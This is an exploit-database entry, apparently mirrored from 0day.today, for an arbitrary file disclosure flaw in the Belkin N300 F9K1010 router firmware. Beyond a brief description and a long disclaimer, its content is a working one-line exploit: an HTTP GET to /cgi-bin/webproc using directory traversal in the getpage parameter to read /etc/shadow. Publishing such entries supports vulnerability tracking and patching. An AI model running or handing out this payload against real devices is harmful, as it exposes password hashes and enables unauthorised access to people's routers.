Lucene search
+L

Belkin N300 Wifi N Router F9K1010 Arbitrary File Disclosure Vulnerability

🗓️ 10 Oct 2015 00:00:00Reported by Todor DonevType 
zdt
 zdt
🔗 0day.today👁 22 Views

Belkin N300 WiFi N Router F9K1010 Arbitrary File Disclosure Vulnerability. Incomplete input validation allows attacker to read arbitrary file

Code
#  Belkin  N300  WiFi N  Router  F9K1010
#  Arbitrary  File  Disclosure
#
#  Copyright 2015 (c) Todor Donev
#  [email protected]
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  http://pastebin.com/u/hackerscommunity
#
#  Version Info:
#  Firmware Version    F9K1010_WW_1.00.06
#  Hardware            F9K1010 v1
#  Boot Version        v1.0.0
#
#  Description:
#  This vulnerability in the Belkin routers could 
#  allow  an  attacker  to  read  the contents of 
#  arbitrary  files. The vulnerability  is due to 
#  incomplete input validation. An attacker could 
#  exploit this  vulnerability  by issuing a full 
#  path to files.
#
#  Disclaimer:
#  This  or  previous program  is  for Educational
#  purpose ONLY. Do not use it without permission.
#  The  usual  disclaimer  applies, especially the
#  fact  that  Todor Donev  is  not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality  provided by these
#  programs.  The author or any  Internet provider
#  bears  NO  responsibility for content or misuse
#  of these programs or  any  derivatives thereof.
#  By  using  these  programs  you accept the fact
#  that any damage (dataloss, system crash, system 
#  compromise,  etc.)  caused  by the use of these 
#  programs is not  Todor Donev's  responsibility.
#
#  Use  at  your  own risk and educational purpose 
#  ONLY!
#
[[email protected] ~]$ GET "http://TARGET/cgi-bin/webproc?getpage=../../../../../../../../../../etc/shadow"

#  0day.today [2018-04-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation